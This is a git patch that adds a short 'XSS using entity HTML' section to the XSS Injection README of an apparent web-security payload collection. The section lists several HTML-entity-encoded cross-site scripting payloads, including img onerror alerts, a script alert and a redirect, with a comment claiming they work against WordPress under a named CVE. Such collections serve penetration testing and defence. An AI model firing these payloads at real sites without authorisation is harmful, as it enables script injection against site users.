From 4604f7bcfbb461a928396661fdad37ebfdfb1962 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Nguy=E1=BB=85n=20Ti=E1=BA=BFn=20D=C5=A9ng?=
 <88418919+dung195@users.noreply.github.com>
Date: Tue, 17 Mar 2026 16:29:27 +0100
Subject: [PATCH] Add entity HTML payload in XSS injection

---
 XSS Injection/README.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 94fb730d3e..6264f30207 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
 <div onpointerout="alert(45)">MOVE HERE</div>
 <div onpointerup="alert(45)">MOVE HERE</div>
 ```
+### XSS using entity HTML
+
+```javascript
+// Works very good at Wordpress (CVE-2025-14588)
+
+&lt;img src=x onerror=alert(1)&gt;
+&lt;img src=x onerror=window.location.href="https://example.com"&gt;
+&lt;img src=1 onerror=&quot;alert(1)&quot;&gt;
+&lt;script&gt;alert(1)&lt;/script&gt;
+```
 
 ### XSS using HTML5 tags